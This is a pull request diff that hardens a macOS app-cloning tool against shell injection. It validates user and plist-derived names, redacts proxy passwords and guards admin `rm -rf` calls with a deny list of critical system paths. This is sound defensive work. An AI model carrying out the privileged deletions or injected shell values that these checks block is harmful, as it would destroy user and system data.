### PR TITLE
security: 输入校验加固 + 凭据脱敏 + 提权删除守卫（封堵 shell 注入链）

### DIFF
--- a/src/atbclone/cli/cmd_clone.py
+++ b/src/atbclone/cli/cmd_clone.py
@@ -15,6 +15,7 @@ from atbclone.core.i18n import t
 from atbclone.core.locale import SUPPORTED_LANGUAGES
 from atbclone.core.logger import get_logger
 from atbclone.core.state import CloneRecord, StateManager
+from atbclone.validation import validate_clone_name, validate_display_name
 from atbclone.executor.runner import CloneError
 from atbclone.recipes import RecipeLoader, supports_data_dir
 
@@ -54,6 +55,20 @@ def clone(
     if icon and not icon.lower().endswith(".icns"):
         console.print(t("clone_err_icon_icns"), soft_wrap=True)
         sys.exit(1)
+
+    # Validate user-supplied names early: they end up inside generated shell
+    # scripts and destination paths, so reject unsafe values with a clear error.
+    for label, value in (("--name", name), ("--display-name", display_name)):
+        if value is None:
+            continue
+        try:
+            if label == "--name":
+                validate_clone_name(value)
+            else:
+                validate_display_name(value)
+        except ValueError as e:
+            console.print(f"[bold red]{label}:[/bold red] {e}", soft_wrap=True)
+            sys.exit(1)
 
     out_path = Path(output_dir).expanduser().resolve()
     out_path.mkdir(parents=True, exist_ok=True)
@@ -114,10 +129,14 @@ def clone(
     )
 
     if proxy_host:
-        task.recipe.proxy.enabled = True
-        task.recipe.proxy.host = proxy_host
-        task.recipe.proxy.port = proxy_port or task.recipe.proxy.port
-        task.recipe.proxy.type = proxy_type
+        try:
+            task.recipe.proxy.enabled = True
+            task.recipe.proxy.host = proxy_host
+            task.recipe.proxy.port = proxy_port or task.recipe.proxy.port
+            task.recipe.proxy.type = proxy_type
+        except ValueError as e:
+            console.print(f"[bold red]--proxy-host:[/bold red] {e}", soft_wrap=True)
+            sys.exit(1)
 
     needs_admin = not dest_path.is_relative_to(Path.home())
 

--- a/src/atbclone/cli/cmd_list.py
+++ b/src/atbclone/cli/cmd_list.py
@@ -7,6 +7,7 @@ from rich.table import Table
 
 from atbclone.core.i18n import t
 from atbclone.core.state import StateManager
+from atbclone.validation import redact_url_credentials
 
 console = Console()
 
@@ -43,7 +44,7 @@ def list_clones() -> None:
     table.add_column(t("list_col_proxy"))
 
     for r in records:
-        proxy_display = r.proxy_summary if r.proxy_enabled else t("list_proxy_disabled")
+        proxy_display = redact_url_credentials(r.proxy_summary) if r.proxy_enabled else t("list_proxy_disabled")
         table.add_row(
             r.clone_name,
             r.source_app,

--- a/src/atbclone/cli/cmd_remove.py
+++ b/src/atbclone/cli/cmd_remove.py
@@ -10,6 +10,7 @@ from atbclone.core.i18n import t
 from atbclone.core.logger import get_logger
 from atbclone.core.state import StateManager
 from atbclone.executor.runner import CloneError, Runner
+from atbclone.validation import validate_deletion_target
 
 console = Console()
 logger = get_logger("cli.remove")
@@ -55,6 +56,17 @@ def remove(clone_name: str, with_data: bool | None, no_with_data: bool) -> None:
             )
         except click.Abort:
             sys.exit(1)
+
+    # The state file is user-writable and unauthenticated: never hand a path
+    # from it straight to `rm -rf` (which may run with admin privileges).
+    try:
+        validate_deletion_target(record.dest_path, expect_bundle=True, field="dest_path")
+        if delete_data:
+            validate_deletion_target(record.data_dir, field="data_dir")
+    except ValueError as e:
+        logger.error(f"Refusing to remove clone '{clone_name}': {e}")
+        console.print(f"[bold red]Error:[/bold red] {e}")
+        sys.exit(1)
 
     needs_admin = (
         not Path(record.dest_path).is_relative_to(Path.home())

--- a/src/atbclone/cli/cmd_update.py
+++ b/src/atbclone/cli/cmd_update.py
@@ -16,6 +16,7 @@ from atbclone.core.logger import get_logger
 from atbclone.core.state import StateManager
 from atbclone.executor.runner import CloneError, Runner
 from atbclone.recipes.loader import RecipeLoader
+from atbclone.validation import validate_deletion_target
 
 console = Console()
 logger = get_logger("cli.update")
@@ -37,6 +38,15 @@ def update(clone_name: str) -> None:
 
     dest_path = Path(record.dest_path)
     needs_admin = not dest_path.is_relative_to(Path.home())
+
+    # The state file is user-writable and unauthenticated: never hand a path
+    # from it straight to `rm -rf` (which may run with admin privileges).
+    try:
+        validate_deletion_target(str(dest_path), expect_bundle=True, field="dest_path")
+    except ValueError as e:
+        logger.error(f"Refusing to update clone '{clone_name}': {e}")
+        console.print(f"[bold red]Error:[/bold red] {e}")
+        sys.exit(1)
 
     logger.info(f"Starting update for clone '{clone_name}' (source='{record.source_path}', strategy='{record.strategy}')")
     console.print(t("update_starting", clone_name=clone_name))

--- a/src/atbclone/cli/cmd_wizard.py
+++ b/src/atbclone/cli/cmd_wizard.py
@@ -12,6 +12,7 @@ from atbclone.core.config import DEFAULT_APPS_DIR, DEFAULT_DATA_DIR
 from atbclone.core.engines import HardCloneEngine, SoftCloneEngine
 from atbclone.core.i18n import t
 from atbclone.core.state import CloneRecord, StateManager
+from atbclone.validation import validate_clone_name, validate_display_name
 from atbclone.executor.runner import CloneError
 from atbclone.recipes import RecipeLoader, supports_data_dir
 
@@ -47,14 +48,28 @@ def wizard() -> None:
     # 3. Clone name
     out_path = DEFAULT_APPS_DIR
     clone_name, num = AppInspector.next_available_name(info.app_name, out_path)
-    clone_name = click.prompt(t("wizard_prompt_clone_name"), default=clone_name)
+    while True:
+        clone_name = click.prompt(t("wizard_prompt_clone_name"), default=clone_name)
+        try:
+            validate_clone_name(clone_name)
+            break
+        except ValueError as e:
+            console.print(f"[bold red]{e}[/bold red]")
 
     # 4. Display name (Dock/Finder)
-    display_name_input = click.prompt(
-        t("wizard_prompt_display_name"),
-        default="",
-    )
-    display_name: str | None = display_name_input.strip() or None
+    while True:
+        display_name_input = click.prompt(
+            t("wizard_prompt_display_name"),
+            default="",
+        )
+        display_name: str | None = display_name_input.strip() or None
+        if display_name is None:
+            break
+        try:
+            validate_display_name(display_name)
+            break
+        except ValueError as e:
+            console.print(f"[bold red]{e}[/bold red]")
 
     # 5. Custom icon
     icon_path: Path | None = None
@@ -134,10 +149,14 @@ def wizard() -> None:
     )
 
     if use_proxy and proxy_host:
-        task.recipe.proxy.enabled = True
-        task.recipe.proxy.host = proxy_host
-        task.recipe.proxy.port = proxy_port or task.recipe.proxy.port
-        task.recipe.proxy.type = proxy_type
+        try:
+            task.recipe.proxy.enabled = True
+            task.recipe.proxy.host = proxy_host
+            task.recipe.proxy.port = proxy_port or task.recipe.proxy.port
+            task.recipe.proxy.type = proxy_type
+        except ValueError as e:
+            console.print(f"[bold red]{e}[/bold red]", soft_wrap=True)
+            sys.exit(1)
 
     out_path.mkdir(parents=True, exist_ok=True)
     needs_admin = not dest_path.is_relative_to(Path.home())

--- a/src/atbclone/core/app_inspector.py
+++ b/src/atbclone/core/app_inspector.py
@@ -4,6 +4,7 @@ import subprocess
 from pathlib import Path
 
 from .models import AppInfo
+from atbclone.validation import sanitize_name_component, validate_bundle_id
 
 
 class AppInspector:
@@ -83,6 +84,11 @@ class AppInspector:
         if not executable_name:
             executable_name = cls._run_cmd(["defaults", "read", str(plist_path), "CFBundleExecutable"]) or path.stem
 
+        # The identifier from the source bundle ends up inside PlistBuddy and
+        # codesign command strings; anything outside the reverse-DNS charset is
+        # treated as malformed/malicious metadata and rejected before cloning.
+        validate_bundle_id(bundle_id)
+
         # Check sandbox entitlements
         entitlements = cls._run_cmd(["codesign", "-d", "--entitlements", "-", str(path)])
         has_sandbox = False
@@ -116,6 +122,9 @@ class AppInspector:
     @staticmethod
     def next_available_name(app_name: str, dest_dir: str | Path) -> tuple[str, int]:
         dest_path = Path(dest_dir)
+        # app_name comes from the source app's Info.plist and is untrusted:
+        # neutralize path separators before it is used to build dest paths.
+        app_name = sanitize_name_component(app_name)
         match = re.match(r"^(.*?)(\d+)$", app_name)
         if match:
             base_name = match.group(1)
@@ -134,6 +143,7 @@ class AppInspector:
     @staticmethod
     def generate_bundle_id(bundle_id: str, num: int = 1) -> str:
         """Generate standardized bundle identifier for a cloned application instance."""
+        validate_bundle_id(bundle_id)
         return f"{bundle_id}.atbclone.{num}"
 
     @classmethod

--- a/src/atbclone/core/clone_task.py
+++ b/src/atbclone/core/clone_task.py
@@ -6,6 +6,12 @@ from pathlib import Path
 from atbclone.recipes.models import Recipe
 
 from .models import AppInfo
+from atbclone.validation import (
+    validate_bundle_id,
+    validate_clone_name,
+    validate_display_name,
+    validate_path_component,
+)
 
 
 @dataclass
@@ -23,3 +29,16 @@ class CloneTask:
     language: str = "system"         # Desired locale/language; defaults to "system"
     injection_strategy: str = "auto" # "auto" | "dylib" | "launcher"
     actual_injection_strategy: str = "auto" # Recorded actual strategy executed ("dylib" | "launcher")
+
+    def __post_init__(self) -> None:
+        """Validate every field that the engines interpolate into generated scripts.
+
+        CloneTask is the single chokepoint shared by CLI, GUI and update flows,
+        so untrusted values are rejected here before any shell script is built.
+        """
+        validate_clone_name(self.clone_name)
+        validate_bundle_id(self.new_bundle_id, field="new_bundle_id")
+        if self.display_name is not None:
+            validate_display_name(self.display_name)
+        validate_path_component(str(self.dest_path), field="dest_path")
+        validate_path_component(str(self.data_dir), field="data_dir")

--- a/src/atbclone/core/engines.py
+++ b/src/atbclone/core/engines.py
@@ -9,6 +9,7 @@ import textwrap
 from atbclone.core.clone_task import CloneTask
 from atbclone.core.locale import build_language_wrapper_snippet
 from atbclone.core.logger import get_logger
+from atbclone.validation import escape_double_quoted
 from atbclone.executor.runner import CloneError, Runner
 
 logger = get_logger("core.engines")
@@ -83,7 +84,7 @@ class CloneEngine:
     @staticmethod
     def _build_display_name_cmd(effective_display_name: str, dst_plist: str, dst_resources: str) -> str:
         """Return a shell snippet that applies display name to Info.plist and removes localized overrides."""
-        name_escaped = effective_display_name.replace('\\', '\\\\').replace('"', '\\"')
+        name_escaped = escape_double_quoted(effective_display_name)
         return textwrap.dedent(f"""
             /usr/libexec/PlistBuddy -c "Set :CFBundleDisplayName {name_escaped}" {dst_plist} 2>/dev/null || /usr/libexec/PlistBuddy -c "Add :CFBundleDisplayName string {name_escaped}" {dst_plist}
             /usr/libexec/PlistBuddy -c "Delete :LSHasLocalizedDisplayName" {dst_plist} 2>/dev/null || true
@@ -181,6 +182,7 @@ class CloneEngine:
         if not whitelist:
             return ""
         data_dir_quoted = shlex.quote(str(task.data_dir))
+        home_quoted = shlex.quote(str(task.data_dir / "Home"))
         lines = []
         for item in whitelist:
             item_clean = item.strip().strip("/")
@@ -189,10 +191,10 @@ class CloneEngine:
             item_quoted = shlex.quote(item_clean)
             lines.append(
                 f'if [ -d {data_dir_quoted} ]; then\n'
-                f'    mkdir -p "{task.data_dir}/Home"\n'
-                f'    if [ ! -e "{task.data_dir}/Home"/{item_quoted} ] && [ -e "$HOME"/{item_quoted} ]; then\n'
-                f'        mkdir -p "$(dirname "{task.data_dir}/Home"/{item_quoted})"\n'
-                f'        ln -s "$HOME"/{item_quoted} "{task.data_dir}/Home"/{item_quoted} 2>/dev/null || true\n'
+                f'    mkdir -p {home_quoted}\n'
+                f'    if [ ! -e {home_quoted}/{item_quoted} ] && [ -e "$HOME"/{item_quoted} ]; then\n'
+                f'        mkdir -p "$(dirname {home_quoted}/{item_quoted})"\n'
+                f'        ln -s "$HOME"/{item_quoted} {home_quoted}/{item_quoted} 2>/dev/null || true\n'
                 f'    fi\n'
                 f'fi'
             )
@@ -210,38 +212,46 @@ class CloneEngine:
         if not orig_bundle_id:
             return ""
         orig_quoted = shlex.quote(orig_bundle_id)
-        new_quoted = shlex.quote(new_bundle_id)
         data_dir_quoted = shlex.quote(str(task.data_dir))
+        home_dir = task.data_dir / "Home"
+        home_quoted = shlex.quote(str(home_dir))
+        prefs_dir_quoted = shlex.quote(str(home_dir / "Library" / "Preferences"))
+        tmp_dir_quoted = shlex.quote(str(task.data_dir / "Tmp"))
+        global_prefs_dst = shlex.quote(str(home_dir / "Library" / "Preferences" / ".GlobalPreferences.plist"))
+        cf_text_dst = shlex.quote(str(home_dir / ".CFUserTextEncoding"))
+        keychains_dir_dst = shlex.quote(str(home_dir / "Library" / "Keychains"))
+        orig_prefs_dst = shlex.quote(str(home_dir / "Library" / "Preferences" / f"{orig_bundle_id}.plist"))
+        new_prefs_dst = shlex.quote(str(home_dir / "Library" / "Preferences" / f"{new_bundle_id}.plist"))
         lines = [
             f'if [ -d {data_dir_quoted} ]; then',
-            f'    mkdir -p "{task.data_dir}/Home/Library/Preferences" "{task.data_dir}/Tmp" 2>/dev/null || true',
-            f'    if [ ! -f "{task.data_dir}/Home/Library/Preferences/.GlobalPreferences.plist" ] && [ -f "$HOME/Library/Preferences/.GlobalPreferences.plist" ]; then',
-            f'        cp "$HOME/Library/Preferences/.GlobalPreferences.plist" "{task.data_dir}/Home/Library/Preferences/.GlobalPreferences.plist" 2>/dev/null || true',
+            f'    mkdir -p {prefs_dir_quoted} {tmp_dir_quoted} 2>/dev/null || true',
+            f'    if [ ! -f {global_prefs_dst} ] && [ -f "$HOME/Library/Preferences/.GlobalPreferences.plist" ]; then',
+            f'        cp "$HOME/Library/Preferences/.GlobalPreferences.plist" {global_prefs_dst} 2>/dev/null || true',
             f'    fi',
-            f'    if [ ! -f "{task.data_dir}/Home/.CFUserTextEncoding" ] && [ -f "$HOME/.CFUserTextEncoding" ]; then',
-            f'        cp "$HOME/.CFUserTextEncoding" "{task.data_dir}/Home/.CFUserTextEncoding" 2>/dev/null || true',
+            f'    if [ ! -f {cf_text_dst} ] && [ -f "$HOME/.CFUserTextEncoding" ]; then',
+            f'        cp "$HOME/.CFUserTextEncoding" {cf_text_dst} 2>/dev/null || true',
             f'    fi',
-            f'    if [ ! -e "{task.data_dir}/Home/Library/Keychains" ] && [ -e "$HOME/Library/Keychains" ]; then',
-            f'        mkdir -p "{task.data_dir}/Home/Library"',
-            f'        ln -s "$HOME/Library/Keychains" "{task.data_dir}/Home/Library/Keychains" 2>/dev/null || true',
+            f'    if [ ! -e {keychains_dir_dst} ] && [ -e "$HOME/Library/Keychains" ]; then',
+            f'        mkdir -p {home_quoted}/Library',
+            f'        ln -s "$HOME/Library/Keychains" {keychains_dir_dst} 2>/dev/null || true',
             f'    fi',
             f'    _ORIG_PLIST="$HOME/Library/Preferences/{orig_quoted}.plist"',
             f'    _CONTAINER_PLIST="$HOME/Library/Containers/{orig_quoted}/Data/Library/Preferences/{orig_quoted}.plist"',
-            f'    if [ ! -f "{task.data_dir}/Home/Library/Preferences/{orig_quoted}.plist" ]; then',
+            f'    if [ ! -f {orig_prefs_dst} ]; then',
             '        if [ -f "$_ORIG_PLIST" ]; then',
-            f'            cp "$_ORIG_PLIST" "{task.data_dir}/Home/Library/Preferences/{orig_quoted}.plist" 2>/dev/null || true',
+            f'            cp "$_ORIG_PLIST" {orig_prefs_dst} 2>/dev/null || true',
             '        elif [ -f "$_CONTAINER_PLIST" ]; then',
-            f'            cp "$_CONTAINER_PLIST" "{task.data_dir}/Home/Library/Preferences/{orig_quoted}.plist" 2>/dev/null || true',
+            f'            cp "$_CONTAINER_PLIST" {orig_prefs_dst} 2>/dev/null || true',
             '        fi',
             '    fi',
         ]
         if orig_bundle_id != new_bundle_id:
             lines.extend([
-                f'    if [ ! -f "{task.data_dir}/Home/Library/Preferences/{new_quoted}.plist" ]; then',
+                f'    if [ ! -f {new_prefs_dst} ]; then',
                 '        if [ -f "$_ORIG_PLIST" ]; then',
-                f'            cp "$_ORIG_PLIST" "{task.data_dir}/Home/Library/Preferences/{new_quoted}.plist" 2>/dev/null || true',
+                f'            cp "$_ORIG_PLIST" {new_prefs_dst} 2>/dev/null || true',
                 '        elif [ -f "$_CONTAINER_PLIST" ]; then',
-                f'            cp "$_CONTAINER_PLIST" "{task.data_dir}/Home/Library/Preferences/{new_quoted}.plist" 2>/dev/null || true',
+                f'            cp "$_CONTAINER_PLIST" {new_prefs_dst} 2>/dev/null || true',
                 '        fi',
                 '    fi',
             ])

--- a/src/atbclone/core/state.py
+++ b/src/atbclone/core/state.py
@@ -1,5 +1,6 @@
 from dataclasses import asdict, dataclass
 from pathlib import Path
+import os
 
 import yaml
 
@@ -66,6 +67,12 @@ class StateManager:
         raw_list = [asdict(r) for r in records]
         with open(self.state_file, "w", encoding="utf-8") as f:
             yaml.safe_dump(raw_list, f, allow_unicode=True, sort_keys=False)
+        # Records may embed proxy credentials in proxy_summary; keep the file
+        # owner-readable only.
+        try:
+            os.chmod(self.state_file, 0o600)
+        except OSError:
+            pass
 
     def add(self, record: CloneRecord) -> None:
         """Append or update a record and persist."""

--- a/src/atbclone/gui/components/clone_card.py
+++ b/src/atbclone/gui/components/clone_card.py
@@ -9,6 +9,7 @@ from toga.style.pack import COLUMN, ROW, CENTER
 from atbclone.core.i18n import t
 from atbclone.core.state import CloneRecord
 from atbclone.gui.theme import Theme
+from atbclone.validation import redact_url_credentials
 
 
 class CloneCard(toga.Box):
@@ -48,7 +49,7 @@ class CloneCard(toga.Box):
         body = toga.Box(style=Pack(direction=COLUMN, margin=(0, 14, 10, 14)))
         body.add(toga.Label(t("card_label_source", source_app=record.source_app), style=Pack(font_size=12.5, color=Theme.TEXT_MUTED, margin_bottom=3)))
         body.add(toga.Label(t("card_label_path", path=Path(record.dest_path).name), style=Pack(font_size=12, color=Theme.TEXT_TERTIARY, margin_bottom=3)))
-        proxy_info = record.proxy_summary if record.proxy_enabled else t("card_proxy_disabled")
+        proxy_info = redact_url_credentials(record.proxy_summary) if record.proxy_enabled else t("card_proxy_disabled")
         body.add(toga.Label(t("card_label_proxy", proxy_info=proxy_info), style=Pack(font_size=12, color=Theme.TEXT_TERTIARY)))
         self.add(body)
 

--- a/src/atbclone/gui/services/clone_service.py
+++ b/src/atbclone/gui/services/clone_service.py
@@ -14,6 +14,7 @@ from atbclone.core.logger import get_logger
 from atbclone.core.state import CloneRecord, StateManager
 from atbclone.executor.runner import Runner
 from atbclone.recipes.loader import RecipeLoader
+from atbclone.validation import validate_deletion_target
 
 logger = get_logger("gui.clone_service")
 
@@ -104,6 +105,9 @@ class CloneService:
                 dest_path = Path(record.dest_path)
                 needs_admin = not dest_path.is_relative_to(Path.home())
 
+                # Guard the tamperable state file before any rm -rf.
+                validate_deletion_target(str(dest_path), expect_bundle=True, field="dest_path")
+
                 script = f"#!/bin/bash\nset -e\nrm -rf {shlex.quote(str(dest_path))}\n"
                 Runner.run(script, needs_admin)
 
@@ -185,6 +189,12 @@ class CloneService:
                     not Path(record.dest_path).is_relative_to(Path.home())
                     or (with_data and not Path(record.data_dir).is_relative_to(Path.home()))
                 )
+
+                # Guard the tamperable state file before any rm -rf (which may
+                # run with admin privileges).
+                validate_deletion_target(record.dest_path, expect_bundle=True, field="dest_path")
+                if with_data:
+                    validate_deletion_target(record.data_dir, field="data_dir")
 
                 lines = [
                     "#!/bin/bash",

--- a/src/atbclone/gui/views/clone_list.py
+++ b/src/atbclone/gui/views/clone_list.py
@@ -17,6 +17,7 @@ from atbclone.gui.components.clone_card import CloneCard
 from atbclone.gui.windows.clone_detail import CloneDetailWindow
 from atbclone.gui.windows.clone_edit import CloneEditWindow
 from atbclone.gui.theme import Theme
+from atbclone.validation import redact_url_credentials
 
 logger = get_logger("gui.clone_list")
 
@@ -256,7 +257,7 @@ class CloneListView(toga.Box):
 
             table_data = []
             for r in self._filtered_clones:
-                proxy_str = r.proxy_summary if r.proxy_enabled else t("list_proxy_disabled")
+                proxy_str = redact_url_credentials(r.proxy_summary) if r.proxy_enabled else t("list_proxy_disabled")
                 table_data.append((
                     r.clone_name,
                     r.source_app,

--- a/src/atbclone/gui/windows/clone_detail.py
+++ b/src/atbclone/gui/windows/clone_detail.py
@@ -12,6 +12,7 @@ from atbclone.core.state import CloneRecord
 from atbclone.gui.components.wrapping_label import WrappingLabel
 from atbclone.gui.patch_cocoa import configure_cocoa_multiline_text_view, configure_cocoa_window
 from atbclone.gui.theme import Theme
+from atbclone.validation import redact_url_credentials
 
 
 def copy_to_clipboard(text: str) -> bool:
@@ -52,7 +53,7 @@ class CloneDetailWindow(toga.Window):
         self.record = record
         self.details: InjectedDetails = CloneInspector.inspect(record)
 
-        proxy_str = record.proxy_summary if record.proxy_enabled else t("list_proxy_disabled")
+        proxy_str = redact_url_credentials(record.proxy_summary) if record.proxy_enabled else t("list_proxy_disabled")
         strat_badge = t("card_strategy_soft") if record.strategy == "soft_clone" else t("card_strategy_hard")
 
         from atbclone.core.locale import SUPPORTED_LANGUAGES
@@ -157,7 +158,7 @@ class CloneDetailWindow(toga.Window):
 
     def get_summary_text(self) -> str:
         """Generate a complete formatted text report of clone details for easy copying/reporting."""
-        proxy_str = self.record.proxy_summary if self.record.proxy_enabled else t("list_proxy_disabled")
+        proxy_str = redact_url_credentials(self.record.proxy_summary) if self.record.proxy_enabled else t("list_proxy_disabled")
         strat_badge = t("card_strategy_soft") if self.record.strategy == "soft_clone" else t("card_strategy_hard")
 
         from atbclone.core.locale import SUPPORTED_LANGUAGES

--- a/src/atbclone/gui/windows/wizard.py
+++ b/src/atbclone/gui/windows/wizard.py
@@ -454,17 +454,26 @@ class WizardWindow(toga.Window):
             recipe.proxy.host = self.input_proxy_host.value.strip() or "127.0.0.1"
             recipe.proxy.port = port
 
-        task = CloneTask(
-            source=self.app_info,
-            dest_path=dest_path,
-            data_dir=data_dir,
-            recipe=recipe,
-            clone_name=clone_name,
-            new_bundle_id=new_bundle_id,
-            display_name=display_name,
-            language=lang,
-            injection_strategy=str(self.select_injection_strat.value),
-        )
+        try:
+            task = CloneTask(
+                source=self.app_info,
+                dest_path=dest_path,
+                data_dir=data_dir,
+                recipe=recipe,
+                clone_name=clone_name,
+                new_bundle_id=new_bundle_id,
+                display_name=display_name,
+                language=lang,
+                injection_strategy=str(self.select_injection_strat.value),
+            )
+        except ValueError as e:
+            self.progress_bar.stop()
+            self.label_status.text = t("win_wizard_status_failed", error=str(e))
+            logger.error(f"Wizard rejected clone inputs for '{clone_name}': {e}")
+            await self.error_dialog(t("dialog_clone_error_title"), str(e))
+            self.btn_next.enabled = True
+            self.btn_prev.enabled = True
+            return
 
         try:
             await self.clone_service.create_clone(task)

--- a/src/atbclone/recipes/models.py
+++ b/src/atbclone/recipes/models.py
@@ -1,8 +1,20 @@
 from typing import Literal
-from pydantic import BaseModel, Field
+from pydantic import BaseModel, ConfigDict, Field, field_validator
+
+from atbclone.validation import (
+    validate_bundle_id,
+    validate_env_key,
+    validate_host,
+    validate_proxy_credential,
+    validate_proxy_port,
+)
 
 
 class ProxyConfig(BaseModel):
+    # Validate on assignment too: CLI/GUI flows mutate proxy fields after
+    # construction, and those values end up inside generated shell scripts.
+    model_config = ConfigDict(validate_assignment=True)
+
     enabled: bool = False
     type: Literal["http", "https", "socks5"] = "http"
     host: str = "127.0.0.1"
@@ -10,6 +22,21 @@ class ProxyConfig(BaseModel):
     username: str = ""
     password: str = ""
     no_proxy: str = "localhost,127.0.0.1,*.local"
+
+    @field_validator("host")
+    @classmethod
+    def _check_host(cls, v: str) -> str:
+        return validate_host(v)
+
+    @field_validator("port")
+    @classmethod
+    def _check_port(cls, v: int) -> int:
+        return validate_proxy_port(v)
+
+    @field_validator("username", "password", "no_proxy")
+    @classmethod
+    def _check_credential(cls, v: str, info) -> str:
+        return validate_proxy_credential(v, field=info.field_name)
 
     @property
     def url(self) -> str:
@@ -22,9 +49,37 @@ InjectionStrategy = Literal["auto", "dylib", "launcher"]
 
 
 class Recipe(BaseModel):
+    model_config = ConfigDict(validate_assignment=True)
+
     bundle_id: str
     app_name: str
     strategy: Literal["hard_clone", "soft_clone"]
+
+    @field_validator("bundle_id")
+    @classmethod
+    def _check_bundle_id(cls, v: str) -> str:
+        return validate_bundle_id(v)
+
+    @field_validator("environment_injection")
+    @classmethod
+    def _check_env_keys(cls, v: dict[str, str]) -> dict[str, str]:
+        for key in v:
+            validate_env_key(key)
+        return v
+
+    @field_validator("symlink_whitelist")
+    @classmethod
+    def _check_symlink_whitelist(cls, v: list[str]) -> list[str]:
+        for item in v:
+            cleaned = item.strip().strip("/")
+            if not cleaned:
+                continue
+            if any(part == ".." for part in cleaned.split("/")):
+                raise ValueError(
+                    f"Invalid symlink_whitelist entry: {item!r}. "
+                    f"'..' path components are not allowed."
+                )
+        return v
     strip_sandbox: bool = False
     proxy: ProxyConfig = Field(default_factory=ProxyConfig)
     environment_injection: dict[str, str] = Field(default_factory=dict)

--- a/src/atbclone/validation.py
+++ b/src/atbclone/validation.py
@@ -7,7 +7,9 @@ The rules are deliberately strict: values that cannot be represented safely are
 rejected with a clear error instead of being escaped aggressively.
 """
 
+import os
 import re
+from pathlib import Path
 
 # Reverse-DNS style bundle identifier: letters, digits, dots, hyphens, underscores.
 # Anything else (quotes, spaces, "$", backticks, slashes...) can smuggle shell
@@ -158,3 +160,96 @@ def validate_proxy_credential(value: str, *, field: str = "credential") -> str:
             f"backticks and whitespace are not supported."
         )
     return value
+
+
+def redact_url_credentials(url: str) -> str:
+    """Redact the password component of a persisted proxy URL for display.
+
+    clones.yaml stores the full proxy URL (required to rebuild the proxy on
+    `update`), but it must never be rendered with credentials in CLI tables,
+    GUI cards or log-like views.
+    """
+    try:
+        from urllib.parse import urlunparse, urlparse
+
+        parsed = urlparse(url)
+        if parsed.username and parsed.password:
+            hostinfo = parsed.hostname or ""
+            if parsed.port:
+                hostinfo = f"{hostinfo}:{parsed.port}"
+            netloc = f"{parsed.username}:***@{hostinfo}"
+            return urlunparse(parsed._replace(netloc=netloc))
+    except (ValueError, AttributeError):
+        pass
+    return url
+
+
+# Paths that must never be accepted as deletion targets, whatever the state
+# file claims. Exact matches refuse deleting the directory itself; clones
+# legitimately live *inside* /Applications and $HOME, so those are exact-only.
+_CRITICAL_EXACT_PATHS = frozenset(
+    {
+        "/",
+        "/Applications",
+        "/Users",
+        "/System",
+        "/Library",
+        "/private",
+        "/usr",
+        "/var",
+        "/etc",
+        "/opt",
+        "/bin",
+        "/sbin",
+        "/Volumes",
+        "/Network",
+        "/dev",
+        "/tmp",
+        "/private/tmp",
+        "/private/var",
+    }
+)
+
+# Nothing inside these trees may ever be deleted via the remove/update flows.
+_CRITICAL_PREFIX_PATHS = frozenset(
+    {
+        "/System",
+        "/usr",
+        "/bin",
+        "/sbin",
+        "/etc",
+        "/Library",
+        "/private/etc",
+    }
+)
+
+
+def validate_deletion_target(path_str: str, *, expect_bundle: bool = False, field: str = "path") -> str:
+    """Guard a path read from clones.yaml before it is passed to `rm -rf`.
+
+    The state file is user-writable and carries no integrity protection; these
+    checks ensure a tampered record cannot turn `remove`/`update` (which may
+    run with administrator privileges) into arbitrary deletion.
+    """
+    if not path_str:
+        raise ValueError(f"Refusing to delete: {field} is empty.")
+    norm = Path(os.path.normpath(str(Path(path_str).expanduser())))
+    text = str(norm)
+    if not norm.is_absolute():
+        raise ValueError(f"Refusing to delete non-absolute {field}: {text!r}.")
+    home = str(Path.home())
+    if text == home or text in _CRITICAL_EXACT_PATHS:
+        raise ValueError(f"Refusing to delete critical {field}: {text!r}.")
+    for prefix in _CRITICAL_PREFIX_PATHS:
+        if text == prefix or text.startswith(prefix + "/"):
+            raise ValueError(f"Refusing to delete {field} inside {prefix!r}: {text!r}.")
+    if len(norm.parts) < 3:
+        raise ValueError(
+            f"Refusing to delete top-level {field}: {text!r}. "
+            f"Clone bundles and data directories are always nested deeper."
+        )
+    if expect_bundle and norm.suffix != ".app":
+        raise ValueError(
+            f"Refusing to delete {field} without a .app suffix: {text!r}."
+        )
+    return text

--- a/src/atbclone/validation.py
+++ b/src/atbclone/validation.py
@@ -1,0 +1,160 @@
+"""Central input validation and shell-escaping helpers.
+
+Every string that ATBClone interpolates into a generated shell script, an
+AppleScript `do shell script` payload, or generated C source must pass through
+this module (or be wrapped with ``shlex.quote``) before it reaches the engine.
+The rules are deliberately strict: values that cannot be represented safely are
+rejected with a clear error instead of being escaped aggressively.
+"""
+
+import re
+
+# Reverse-DNS style bundle identifier: letters, digits, dots, hyphens, underscores.
+# Anything else (quotes, spaces, "$", backticks, slashes...) can smuggle shell
+# payloads through PlistBuddy / codesign command strings.
+BUNDLE_ID_PATTERN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")
+
+# Environment variable names accepted by setenv(3) / POSIX export.
+ENV_KEY_PATTERN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
+
+# Proxy hostnames, IPv4 and bracketed IPv6 literals.
+HOST_PATTERN = re.compile(r"^[A-Za-z0-9._:\[\]-]+$")
+
+# Characters that never legitimately appear in names or paths we interpolate.
+_FORBIDDEN_CTRL_PATTERN = re.compile(r"[\x00-\x1f\x7f]")
+
+# Characters rejected in proxy credentials / no_proxy: they break the generated
+# shell `export` lines, the embedded URL, or the generated C launcher source.
+_PROXY_FORBIDDEN_PATTERN = re.compile(r"""["'`$\\\s\x00-\x1f\x7f]""")
+
+
+def validate_bundle_id(value: str, *, field: str = "bundle_id") -> str:
+    """Validate a bundle identifier; return it unchanged or raise ValueError.
+
+    Applied to both source app identifiers read from Info.plist and generated
+    clone identifiers, because both end up inside PlistBuddy command strings.
+    """
+    if not value or not BUNDLE_ID_PATTERN.match(value):
+        raise ValueError(
+            f"Invalid {field}: {value!r}. Expected a reverse-DNS identifier "
+            f"(letters, digits, dots, hyphens, underscores only)."
+        )
+    return value
+
+
+def validate_env_key(key: str) -> str:
+    """Validate an environment variable name used in environment_injection."""
+    if not ENV_KEY_PATTERN.match(key):
+        raise ValueError(
+            f"Invalid environment variable name: {key!r}. "
+            f"Expected letters, digits and underscores, starting with a letter or underscore."
+        )
+    return key
+
+
+def validate_clone_name(name: str) -> str:
+    """Validate a clone name used to build destination paths.
+
+    Path separators would let a name escape the output directory (path
+    traversal), and NUL/control characters break the generated scripts.
+    """
+    if not name or not name.strip():
+        raise ValueError("Clone name must not be empty.")
+    if _FORBIDDEN_CTRL_PATTERN.search(name):
+        raise ValueError(f"Clone name contains control characters: {name!r}.")
+    if "/" in name or "\\" in name:
